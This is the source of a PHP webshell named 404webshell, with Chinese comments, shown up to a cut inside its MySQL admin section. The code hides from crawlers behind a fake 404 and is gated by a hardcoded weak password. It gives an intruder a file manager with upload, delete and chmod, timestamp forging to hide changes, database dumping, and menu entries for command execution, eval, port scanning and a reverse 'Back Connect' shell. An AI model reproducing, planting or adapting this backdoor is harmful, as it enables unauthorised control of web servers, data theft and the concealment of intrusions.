p86v00fA

1<?php
2/**
3 * Short description for 404webshell.php
4 *
5 * @package 404webshell
6 * @author xl7dev <xl7dev@xl7dev.local>
7 * @version 0.1
8 * @copyright (C) 2015 xl7dev <xl7dev@xl7dev.local>
9 * @license MIT
10 */
11//ini_set('display_errors',1);
12@error_reporting(7);
13@session_start();
14@set_time_limit(0);
15@set_magic_quotes_runtime(0);
16if( strpos( strtolower( $_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
17    header('HTTP/1.0 404 Not Found');
18    exit;
19}
20ob_start();
21$mtime = explode(' ', microtime());
22$starttime = $mtime[1] + $mtime[0];
23define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
24define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
25define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
26define('IS_GPC', get_magic_quotes_gpc());
27$dis_func = get_cfg_var('disable_functions');
28define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
29if( IS_GPC ) { 
30    $_POST = s_array($_POST);
31}
32$P = $_POST;
33unset($_POST);
34/*===================== 程序配置 =====================*/
35$pass  = 'e10adc3949ba59abbe56e057f20f883e'; //对应的密码是 123456
36//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
37// cookie 前缀
38$cookiepre = '';
39// cookie 作用域
40$cookiedomain = '';
41// cookie 作用路径
42$cookiepath = '/';
43// cookie 有效期
44$cookielife = 86400;
45/*===================== 配置结束 =====================*/
46$charsetdb = array(
47    'big5'          =&gt; 'big5',
48    'cp-866'        =&gt; 'cp866',
49    'euc-jp'        =&gt; 'ujis',
50    'euc-kr'        =&gt; 'euckr',
51    'gbk'           =&gt; 'gbk',
52    'iso-8859-1'    =&gt; 'latin1',
53    'koi8-r'        =&gt; 'koi8r',
54    'koi8-u'        =&gt; 'koi8u',
55    'utf-8'         =&gt; 'utf8',
56    'windows-1252'  =&gt; 'latin1',
57);
58$act = isset($P['act']) ? $P['act'] : '';
59$charset = isset($P['charset']) ? $P['charset'] : 'gbk';
60$doing = isset($P['doing']) ? $P['doing'] : '';
61for ($i=1;$i&lt;=4;$i++) {
62    ${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : '';
63}
64if (isset($charsetdb[$charset])) {
65    header("content-Type: text/html; charset=".$charset);
66}
67$timestamp = time();
68/* 身份验证 */
69if ($act == "Logout") {
70    scookie('loginpass', '', -86400 * 365);
71    @header('Location: '.SELF);
72    exit;
73}
74if($pass) {
75    if ($act == 'login') {
76        if ($pass == encode_pass($P['password'])) {
77            scookie('loginpass',encode_pass($P['password']));
78            @header('Location: '.SELF);
79            exit;
80        }
81    }
82    if (isset($_COOKIE['loginpass'])) {
83        if ($_COOKIE['loginpass'] != $pass) {
84            loginpage();
85        }
86    } else {
87        loginpage();
88    }
89}
90/* 验证结束 */
91$errmsg = '';
92$uchar = 'â–²';
93$dchar = 'â–¼';
94!$act &amp;&amp; $act = 'file';
95//当前目录/设置工作目录/网站根目录
96$home_cwd = getcwd();
97if (isset($P['cwd']) &amp;&amp; $P['cwd']) {
98    chdir($P['cwd']);
99} else {
100    chdir(SA_ROOT);
101}
102$cwd = getcwd();
103$web_cwd = $_SERVER['DOCUMENT_ROOT'];
104foreach (array('web_cwd','cwd','home_cwd') as $k) {
105    if (IS_WIN) {
106        $$k = str_replace('\\', '/', $$k);
107    }
108    if (substr($$k, -1) != '/') {
109        $$k = $$k.'/';
110    }
111}
112// 查看PHPINFO
113if ($act == 'phpinfo') {
114    if (IS_PHPINFO) {
115        phpinfo();
116        exit;
117    } else {
118        $errmsg = 'phpinfo() function has disabled';
119    }
120}
121if(!function_exists('scandir')) {
122    function scandir($cwd) {
123        $files = array();
124        $dh = opendir($cwd);
125        while ($file = readdir($dh)) {
126            $files[] = $file;
127        }
128        return $files ? $files : 0;
129    }
130}
131if ($act == 'down') {
132    if (is_file($p1) &amp;&amp; is_readable($p1)) {
133        @ob_end_clean();
134        $fileinfo = pathinfo($p1);
135        if (function_exists('mime_content_type')) {
136            $type = @mime_content_type($p1);
137            header("Content-Type: ".$type);
138        } else {
139            header('Content-type: application/x-'.$fileinfo['extension']);
140        }
141        header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
142        header('Content-Length: '.sprintf("%u", @filesize($p1)));
143        @readfile($p1);
144        exit;
145    } else {
146        $errmsg = 'Can\'t read file';
147        $act = 'file';
148    }
149}
150?&gt;
151&lt;html&gt;
152&lt;head&gt;
153&lt;meta http-equiv="Content-Type" content="text/html; charset=&lt;?php echo $charset;?&gt;"&gt;
154&lt;title&gt;&lt;?php echo $act.' - '.$_SERVER['HTTP_HOST'];?&gt;&lt;/title&gt;
155&lt;style type="text/css"&gt;
156body,td{font: 12px Arial,Tahoma;line-height: 16px;}
157.input, select{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
158.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
159.red{color:#f00;}
160.black{color:#000;}
161.green{color:#090;}
162.b{font-weight:bold;}
163.bt {border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}
164a {color: #00f;text-decoration:none;}
165a:hover{color: #f00;text-decoration:underline;}
166.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
167.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
168.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}
169.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
170.head td span{font-weight:normal;}
171.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
172form{margin:0;padding:0;}
173h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
174ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
175u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
176.drives{padding:5px;}
177.drives span {margin:auto 7px;}
178&lt;/style&gt;
179&lt;script type="text/javascript"&gt;
180function checkall(form) {
181    for(var i=0;i&lt;form.elements.length;i++) {
182        var e = form.elements[i];
183        if (e.type == 'checkbox') {
184            if (e.name != 'chkall' &amp;&amp; e.name != 'saveasfile')
185                e.checked = form.chkall.checked;
186        }
187    }
188}
189function $(id) {
190    return document.getElementById(id);
191}
192function createdir(){
193    var newdirname;
194    newdirname = prompt('请输入目录名:', '');
195    if (!newdirname) return;
196    g(null,null,'createdir',newdirname);
197}
198function fileperm(pfile, val){
199    var newperm;
200    newperm = prompt('当前 目录/文件:'+pfile+'\n请输入新的权限:', val);
201    if (!newperm) return;
202    g(null,null,'fileperm',pfile,newperm);
203}
204function rename(oldname){
205    var newfilename;
206    newfilename = prompt('文件名:'+oldname+'\n请输入新的文件名:', '');
207    if (!newfilename) return;
208    g(null,null,'rename',newfilename,oldname);
209}
210function createfile(){
211    var filename;
212    filename = prompt('请输入文件的名字:', '');
213    if (!filename) return;
214    g('editfile', null, null, filename);
215}
216function setdb(dbname) {
217    if(!dbname) return;
218    $('dbform').tablename.value='';
219    $('dbform').doing.value='';
220    if ($('dbform').sql_query)
221    {
222        $('dbform').sql_query.value='';
223    }
224    $('dbform').submit();
225}
226function setsort(k) {
227    $('dbform').order.value=k;
228    $('dbform').submit();
229}
230function settable(tablename,doing) {
231    if(!tablename) return;
232    if (doing) {
233        $('dbform').doing.value=doing;
234    } else {
235        $('dbform').doing.value='';
236    }
237    $('dbform').sql_query.value='';
238    $('dbform').tablename.value=tablename;
239    $('dbform').submit();
240}
241function s(act,cwd,p1,p2,p3,p4,charset) {
242    if(act != null) $('opform').act.value=act;
243    if(cwd != null) $('opform').cwd.value=cwd;
244    if(p1 != null) $('opform').p1.value=p1;
245    if(p2 != null) $('opform').p2.value=p2;
246    if(p3 != null) $('opform').p3.value=p3;
247    if(p4 != null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}
248    if(charset != null) $('opform').charset.value=charset;
249}
250function g(act,cwd,p1,p2,p3,p4,charset) {
251    s(act,cwd,p1,p2,p3,p4,charset);
252    $('opform').submit();
253}
254&lt;/script&gt;
255&lt;/head&gt;
256&lt;body style="margin:0;table-layout:fixed; word-break:break-all"&gt;
257&lt;?php
258formhead(array('name'=&gt;'opform'));
259makehide('act', $act);
260makehide('cwd', $cwd);
261makehide('p1', $p1);
262makehide('p2', $p2);
263makehide('p3', $p3);
264makehide('p4', $p4);
265makehide('charset', $charset);
266formfoot();
267if(!function_exists('posix_getegid')) {
268    $user = @get_current_user();
269    $uid = @getmyuid();
270    $gid = @getmygid();
271    $group = "?";
272} else {
273    $uid = @posix_getpwuid(@posix_geteuid());
274    $gid = @posix_getgrgid(@posix_getegid());
275    $uid = $uid['uid'];
276    $user = $uid['name'];
277    $gid = $gid['gid'];
278    $group = $gid['name'];
279}
280?&gt;
281&lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
282    &lt;tr class="head"&gt;
283        &lt;td&gt;&lt;span style="float:right;"&gt;&lt;?php echo @php_uname();?&gt; / User:&lt;?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?&gt;&lt;/span&gt;&lt;?php echo $_SERVER['HTTP_HOST'];?&gt; (&lt;?php echo gethostbyname($_SERVER['SERVER_NAME']);?&gt;)&lt;/td&gt;
284    &lt;/tr&gt;
285    &lt;tr class="alt1"&gt;
286        &lt;td&gt;
287            &lt;span style="float:right;"&gt;编码:
288            &lt;?php
289            makeselect(array('name'=&gt;'charset','option'=&gt;$charsetdb,'selected'=&gt;$charset,'onchange'=&gt;'g(null,null,null,null,null,null,this.value);'));
290            ?&gt;
291            &lt;/span&gt;
292            &lt;a href="javascript:g('logout');"&gt;注销&lt;/a&gt; | 
293            &lt;a href="javascript:g('file',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;文件管理器&lt;/a&gt; | 
294            &lt;a href="javascript:g('mysqladmin',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;MYSQL管理&lt;/a&gt; | 
295            &lt;a href="javascript:g('shell',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;执行命令&lt;/a&gt; | 
296            &lt;a href="javascript:g('phpenv',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;PHP变量&lt;/a&gt; | 
297            &lt;a href="javascript:g('portscan',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;端口扫描&lt;/a&gt; | 
298            &lt;a href="javascript:g('secinfo',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;安全信息&lt;/a&gt; | 
299            &lt;a href="javascript:g('eval',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;Eval PHP代码&lt;/a&gt;
300            &lt;?php if (!IS_WIN) {?&gt; | &lt;a href="javascript:g('backconnect',null,'','','','','&lt;?php echo $charset;?&gt;');"&gt;Back Connect&lt;/a&gt;&lt;?php }?&gt;
301        &lt;/td&gt;
302    &lt;/tr&gt;
303&lt;/table&gt;
304&lt;table width="100%" border="0" cellpadding="15" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;
305&lt;?php
306$errmsg &amp;&amp; m($errmsg);
307if ($act == 'file') {
308    // 判断当前目录可写情况
309    $dir_writeable = @is_writable($cwd) ? 'Writable' : 'Non-writable';
310    if (isset($p1)) {
311        switch($p1) {
312            case 'createdir':
313                // 创建目录
314                if ($p2) {
315                    m('Directory created '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
316                }
317                break;
318            case 'uploadFile':
319                // 上传文件
320                m('File upload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'], $cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
321                break;
322            case 'fileperm':
323                // 编辑文件属性
324                if ($p2 &amp;&amp; $p3) {
325                    $p3 = base_convert($p3, 8, 10);
326                    m('Set file permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
327                }
328                break;
329            case 'rename':
330                // 改名
331                if ($p2 &amp;&amp; $p3) {
332                    m($p3.' renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
333                }
334                break;
335            case 'clonetime':
336                // 克隆时间
337                if ($p2 &amp;&amp; $p3) {
338                    $time = @filemtime($p3);
339                    m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
340                }
341                break;
342            case 'settime':
343                // 自定义时间
344                if ($p2 &amp;&amp; $p3) {
345                    $time = strtotime($p3);
346                    m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
347                }
348                break;
349            case 'delete':
350                // 批量删除文件
351                if ($P['dl']) {
352                    $succ = $fail = 0;
353                    foreach ($P['dl'] as $f) {
354                        if (is_dir($cwd.$f)) {
355                            if (@deltree($cwd.$f)) {
356                                $succ++;
357                            } else {
358                                $fail++;
359                            }
360                        } else {
361                            if (@unlink($cwd.$f)) {
362                                $succ++;
363                            } else {
364                                $fail++;
365                            }
366                        }
367                    }
368                    m('Deleted folder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.', fail '.$fail);
369                } else {
370                    m('Please select folder/file(s)');
371                }
372                break;
373            case 'paste':
374                if($_SESSION['do'] == 'copy') {
375                    foreach($_SESSION['dl'] as $f) {
376                        copy_paste($_SESSION['c'],$f, $cwd);                    
377                    }
378                } elseif($_SESSION['do'] == 'move') {
379                    foreach($_SESSION['dl'] as $f) {
380                        @rename($_SESSION['c'].$f, $cwd.$f);
381                    }
382                }
383                unset($_SESSION['do'], $_SESSION['dl'], $_SESSION['c']);
384                break;
385            default:
386                if($p1 == 'copy' || $p1 == 'move') {
387                    if (isset($P['dl']) &amp;&amp; count($P['dl'])) {
388                        $_SESSION['do'] = $p1;
389                        $_SESSION['dl'] = $P['dl'];
390                        $_SESSION['c'] = $P['cwd'];
391                        m('Have been copied to the session');
392                    } else {
393                        m('Please select folder/file(s)');
394                    }
395                }
396                break;
397        }
398        echo "&lt;script type=\"text/javascript\"&gt;$('opform').p1.value='';$('opform').p2.value='';&lt;/script&gt;";
399    }
400    //操作完毕
401    $free = @disk_free_space($cwd);
402    !$free &amp;&amp; $free = 0;
403    $all = @disk_total_space($cwd);
404    !$all &amp;&amp; $all = 0;
405    $used = $all-$free;
406    p('&lt;h2&gt;文件管理器——当前的磁盘空间 '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)&lt;/h2&gt;');
407    $cwd_links = '';
408    $path = explode('/', $cwd);
409    $n=count($path);
410    for($i=0;$i&lt;$n-1;$i++) {
411        $cwd_links .= '&lt;a href="javascript:g(\'file\', \'';
412        for($j=0;$j&lt;=$i;$j++) {
413            $cwd_links .= $path[$j].'/';
414        }
415        $cwd_links .= '\');"&gt;'.$path[$i].'/&lt;/a&gt;';
416    }
417?&gt;
418&lt;script type="text/javascript"&gt;
419document.onclick = shownav;
420function shownav(e){
421    var src = e?e.target:event.srcElement;
422    do{
423        if(src.id =="jumpto") {
424            $('inputnav').style.display = "";
425            $('pathnav').style.display = "none";
426            return;
427        }
428        if(src.id =="inputnav") {
429            return;
430        }
431        src = src.parentNode;
432    }while(src.parentNode)
433    $('inputnav').style.display = "none";
434    $('pathnav').style.display = "";
435}
436&lt;/script&gt;
437&lt;div style="background:#eee;margin-bottom:10px;"&gt;
438    &lt;form onsubmit="g('file',this.cwd.value);return false;" method="POST" id="godir" name="godir"&gt;
439        &lt;table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0"&gt;
440            &lt;tr&gt;
441                &lt;td width="100%"&gt;&lt;?php echo $cwd_links.' - '.getChmod($cwd).' / '.PermsColor($cwd).getUser($cwd);?&gt; (&lt;?php echo $dir_writeable;?&gt;)&lt;/td&gt;
442                &lt;td nowrap&gt;&lt;input class="bt" id="jumpto" name="jumpto" value="进入" type="button"&gt;&lt;/td&gt;
443            &lt;/tr&gt;
444        &lt;/table&gt;
445        &lt;table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;"&gt;
446            &lt;tr&gt;
447                &lt;td nowrap&gt;当前目录 (&lt;?php echo $dir_writeable;?&gt;, &lt;?php echo getChmod($cwd);?&gt;)&lt;/td&gt;
448                &lt;td width="100%"&gt;&lt;input class="input" name="cwd" value="&lt;?php echo $cwd;?&gt;" type="text" style="width:99%;margin:0 8px;"&gt;&lt;/td&gt;
449                &lt;td nowrap&gt;&lt;input class="bt" value="GO" type="submit"&gt;&lt;/td&gt;
450            &lt;/tr&gt;
451        &lt;/table&gt;
452    &lt;/form&gt;
453&lt;?php
454    if (IS_WIN) {
455        $comma = '';
456        p('&lt;div class="drives"&gt;');
457        foreach( range('A','Z') as $drive ) {
458            if (is_dir($drive.':/')) {
459                p($comma.'&lt;a href="javascript:g(\'file\', \''.$drive.':/\');"&gt;'.$drive.':\&lt;/a&gt;');
460                $comma = '&lt;span&gt;|&lt;/span&gt;';
461            }
462        }
463        p('&lt;/div&gt;');
464    }
465?&gt;
466&lt;/div&gt;
467&lt;?php
468    p('&lt;table width="100%" border="0" cellpadding="4" cellspacing="0"&gt;');
469    p('&lt;tr class="alt1"&gt;&lt;td colspan="6" style="padding:5px;line-height:20px;"&gt;');
470    p('&lt;form action="'.SELF.'" method="POST" enctype="multipart/form-data"&gt;&lt;div style="float:right;"&gt;&lt;input name="uploadfile" value="" type="file" /&gt; &lt;input class="bt" value="上传" type="submit" /&gt;&lt;input name="charset" value="'.$charset.'" type="hidden" /&gt;&lt;input type="hidden" name="p1" value="uploadFile"&gt;&lt;input name="cwd" value="'.$cwd.'" type="hidden" /&gt;&lt;/div&gt;&lt;/form&gt;');
471    p('&lt;a href="javascript:g(\'file\', \''.str_replace('\\','/',$web_cwd).'\');"&gt;根目录&lt;/a&gt;');
472    p(' | &lt;a href="javascript:g(\'file\', \''.$home_cwd.'\');"&gt;程序目录&lt;/a&gt;');
473    p(' | &lt;a href="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');"&gt;可写目录&lt;/a&gt; ');
474    p(' | &lt;a href="javascript:createdir();"&gt;新建目录&lt;/a&gt; | &lt;a href="javascript:createfile();"&gt;新建文件&lt;/a&gt;');
475    p('&lt;/td&gt;&lt;/tr&gt;');
476    $sort = array('filename', 1);
477    if($p1) {
478        if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
479            $sort = array($match[1], (int)$match[2]);
480        }
481    }
482    formhead(array('name'=&gt;'flist'));
483    makehide('act','file');
484    makehide('p1','');
485    makehide('cwd',$cwd);
486    makehide('charset',$charset);
487    p('&lt;tr class="head"&gt;');
488    p('&lt;td width="2%" nowrap&gt;&lt;input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /&gt;&lt;/td&gt;');
489    p('&lt;td&gt;&lt;a href="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');"&gt;文件名&lt;/a&gt; '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'&lt;/td&gt;');
490    p('&lt;td width="16%"&gt;&lt;a href="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');"&gt;修改时间&lt;/a&gt; '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'&lt;/td&gt;');
491    p('&lt;td width="10%"&gt;&lt;a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');"&gt;大小&lt;/a&gt; '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'&lt;/td&gt;');
492    p('&lt;td width="20%"&gt;权限 / 修改&lt;/td&gt;');
493    p('&lt;td width="22%"&gt;操作&lt;/td&gt;');
494    p('&lt;/tr&gt;');
495    //查看所有可写文件和目录
496    $dirdata=$filedata=array();
497    if ($p4 == 'dir') {
498        $dirdata = GetWDirList($cwd);
499        $filedata = array();
500    } else {
501        // 默认目录列表
502        $dirs = @scandir($cwd);
503        if ($dirs) {
504            $dirs = array_diff($dirs, array('.'));
505            foreach ($dirs as $file) {
506                $filepath=$cwd.$file;
507                if(@is_dir($filepath)){
508                    $dirdb['filename']=$file;
509                    $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
510                    $dirdb['chmod']=getChmod($filepath);
511                    $dirdb['perm']=PermsColor($filepath);
512                    $dirdb['owner']=getUser($filepath);
513                    $dirdb['link']=$filepath;
514                    if ($file=='..') {
515                        $dirdata['up']=1;
516                    } else {
517                        $dirdata[]=$dirdb;
518                    }
519                } else {
520                    $filedb['filename']=$file;
521                    //$filedb['size']=@filesize($filepath);
522                    $filedb['size']=sprintf("%u", @filesize($filepath));
523                    $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
524                    $filedb['chmod']=getChmod($filepath);
525                    $filedb['perm']=PermsColor($filepath);
526                    $filedb['owner']=getUser($filepath);
527                    $filedb['link']=$filepath;
528                    $filedata[]=$filedb;
529                }
530            }
531            unset($dirdb);
532            unset($filedb);
533        }
534    }
535    $dir_i = '0';
536    if (isset($dirdata['up'])) {
537        $thisbg = bg();
538        p('&lt;tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';"&gt;');
539        p('&lt;td align="center"&gt;-&lt;/td&gt;&lt;td nowrap colspan="5"&gt;&lt;a href="javascript:g(\'file\',\''.getUpPath($cwd).'\');"&gt;Parent Directory&lt;/a&gt;&lt;/td&gt;');
540        p('&lt;/tr&gt;');
541    }
542    unset($dirdata['up']);
543    usort($dirdata, 'cmp');
544    usort($filedata, 'cmp');
545    foreach($dirdata as $key =&gt; $dirdb){
546        if($p1 == 'getsize' &amp;&amp; $p2 == $dirdb['filename']) {
547            $attachsize = dirsize($p2);
548            $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
549        } else {
550            $attachsize = '&lt;a href="javascript:g(\'file\', null, \'getsize\', \''.$dirdb['filename'].'\');"&gt;查看大小&lt;/a&gt;';
551        }
552        $thisbg = bg();
553        p('&lt;tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';"&gt;');
554        p('&lt;td width="2%" nowrap&gt;&lt;input name="dl[]" type="checkbox" value="'.$dirdb['filename'].'"&gt;&lt;/td&gt;');
555        p('&lt;td&gt;&lt;a href="javascript:g(\'file\',\''.$dirdb['link'].'\')"&gt;'.$dirdb['filename'].'&lt;/a&gt;&lt;/td&gt;');
556        p('&lt;td nowrap&gt;&lt;a href="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');"&gt;'.$dirdb['mtime'].'&lt;/a&gt;&lt;/td&gt;');
557        p('&lt;td nowrap&gt;'.$attachsize.'&lt;/td&gt;');
558        p('&lt;td nowrap&gt;');
559        p('&lt;a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');"&gt;'.$dirdb['chmod'].'&lt;/a&gt; / ');
560        p('&lt;a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');"&gt;'.$dirdb['perm'].'&lt;/a&gt;'.$dirdb['owner'].'&lt;/td&gt;');
561        p('&lt;td nowrap&gt;&lt;a href="javascript:rename(\''.$dirdb['filename'].'\');"&gt;重命名&lt;/a&gt;&lt;/td&gt;');
562        p('&lt;/tr&gt;');
563        $dir_i++;
564    }
565    p('&lt;tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"&gt;&lt;td colspan="6" height="5"&gt;&lt;/td&gt;&lt;/tr&gt;');
566    $file_i = '0';
567    foreach($filedata as $key =&gt; $filedb){
568        $fileurl = '/'.str_replace($web_cwd,'',$filedb['link']);
569        $thisbg = bg();
570        p('&lt;tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';"&gt;');
571        p('&lt;td width="2%" nowrap&gt;&lt;input name="dl[]" type="checkbox" value="'.$filedb['filename'].'"&gt;&lt;/td&gt;');
572        p('&lt;td&gt;'.((strpos($filedb['link'], $web_cwd) !== false) ? '&lt;a href="'.$fileurl.'" target="_blank"&gt;'.$filedb['filename'].'&lt;/a&gt;' : $filedb['filename']).'&lt;/td&gt;');
573        p('&lt;td nowrap&gt;&lt;a href="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');"&gt;'.$filedb['mtime'].'&lt;/a&gt;&lt;/td&gt;');
574        p('&lt;td nowrap&gt;'.sizecount($filedb['size']).'&lt;/td&gt;');
575        p('&lt;td nowrap&gt;');
576        p('&lt;a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');"&gt;'.$filedb['chmod'].'&lt;/a&gt; / ');
577        p('&lt;a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');"&gt;'.$filedb['perm'].'&lt;/a&gt;'.$filedb['owner'].'&lt;/td&gt;');
578        p('&lt;td nowrap&gt;');
579        p('&lt;a href="javascript:g(\'down\',null,\''.$filedb['filename'].'\');"&gt;下载&lt;/a&gt; | ');
580        p('&lt;a href="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');"&gt;编辑&lt;/a&gt; | ');
581        p('&lt;a href="javascript:rename(\''.$filedb['filename'].'\');"&gt;重命名&lt;/a&gt;');
582        p('&lt;/td&gt;&lt;/tr&gt;');
583        $file_i++;
584    }
585    p('&lt;tr class="'.bg().' head"&gt;&lt;td colspan="5"&gt;&lt;a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();"&gt;删除&lt;/a&gt; | &lt;a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();"&gt;复制&lt;/a&gt; | &lt;a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();"&gt;移动&lt;/a&gt;'.(isset($_SESSION['do']) &amp;&amp; @count($_SESSION['dl']) ? ' | &lt;a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();"&gt;Paste&lt;/a&gt;' : '').'&lt;/td&gt;&lt;td align="right"&gt;'.$dir_i.' 目录 / '.$file_i.' 文件&lt;/td&gt;&lt;/tr&gt;');
586    p('&lt;/form&gt;&lt;/table&gt;');
587}// end dir
588elseif ($act == 'mysqladmin') {
589    $order = isset($P['order']) ? $P['order'] : '';
590    $dbhost = isset($P['dbhost']) ? $P['dbhost'] : '';
591    $dbuser = isset($P['dbuser']) ? $P['dbuser'] : '';
592    $dbpass = isset($P['dbpass']) ? $P['dbpass'] : '';
593    $dbname = isset($P['dbname']) ? $P['dbname'] : '';
594    $tablename = isset($P['tablename']) ? $P['tablename'] : '';
595    if ($doing == 'dump') {
596        if (isset($P['bak_table']) &amp;&amp; $P['bak_table']) {
597            $DB = new DB_MySQL;
598            $DB-&gt;charsetdb = $charsetdb;
599            $DB-&gt;charset = $charset;
600            $DB-&gt;connect($dbhost, $dbuser, $dbpass, $dbname);
601            if ($P['saveasfile'] &amp;&amp; $P['bak_path']) {
602                $fp = @fopen($P['bak_path'],'w');
603                if ($fp) {
604                    foreach($P['bak_table'] as $k =&gt; $v) {
605                        if ($v) {
606                            $DB-&gt;sqldump($v, $fp);
607                        }
608                    }
609                    fclose($fp);                
610                    $fileurl = str_replace(SA_ROOT,'',$P['bak_path']);
611                    m('Database has backup to &lt;a href="'.$fileurl.'" target="_blank"&gt;'.$P['bak_path'].'&lt;/a&gt;');
612                } else {
613                    m('Backup failed');
614                }
615            } else {
616                @ob_end_clean();
617                $filename = basename($dbname.'.sql');
618                header('Content-type: application/unknown');
619                header('Content-Disposition: attachment; filename='.$filename);
620                foreach($P['bak_table'] as $k =&gt; $v) {
621                    if ($v) {
622                        $DB-&gt;sqldump($v);
623                    }
624                }
625                exit;
626            }
627            $DB-&gt;close();
628        } else {
629            m('Please choose the table');
630        }
631        $doing = '';
632    }
633    formhead(array('title'=&gt;'MYSQL 管理', 'name'=&gt;'dbform'));
634    makehide('act','mysqladmin');
635    makehide('doing',$doing);
636    makehide('charset', $charset);
637    makehide('tablename', $tablename);
638    makehide('order', $order);
639    p('&lt;p&gt;');
640    p('地址:');
641    makeinput(array('name'=&gt;'dbhost','size'=&gt;20,'value'=&gt;$dbhost));
642    p('用户:');
643    makeinput(array('name'=&gt;'dbuser','size'=&gt;15,'value'=&gt;$dbuser));
644    p('密码:');
645    makeinput(array('name'=&gt;'dbpass','size'=&gt;15,'value'=&gt;$dbpass));
646    makeinput(array('value'=&gt;'连接','type'=&gt;'submit','class'=&gt;'bt'));
647    p('&lt;/p&gt;');
648    if ($dbhost &amp;&amp; $dbuser &amp;&amp; isset($dbpass)) {
649        
650        // 初始化数据库类
651        $DB = new DB_MySQL;
652        $DB-&gt;charsetdb = $charsetdb;
653        $DB-&gt;charset = $charset;
654        $DB-&gt;connect($dbhost, $dbuser, $dbpass, $dbname);
655        //获取数据库信息
656        p('&lt;p class="red"&gt;MySQL '.$DB-&gt;version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'&lt;/p&gt;');
657        $highver = $DB-&gt;version() &gt; '4.1' ? 1 : 0;
658        //获取数据库
659        $query = $DB-&gt;query("SHOW DATABASES");
660        $dbs = array();
661        $dbs[] = '-- Select a database --';
662        while($db = $DB-&gt;fetch($query)) {
663            $dbs[$db['Database']] = $db['Database'];
664        }
665        makeselect(array('name'=&gt;'dbname','option'=&gt;$dbs,'selected'=&gt;$dbname,'onchange'=&gt;'setdb(this.options[this.selectedIndex].value)'));
666        if ($dbname) {
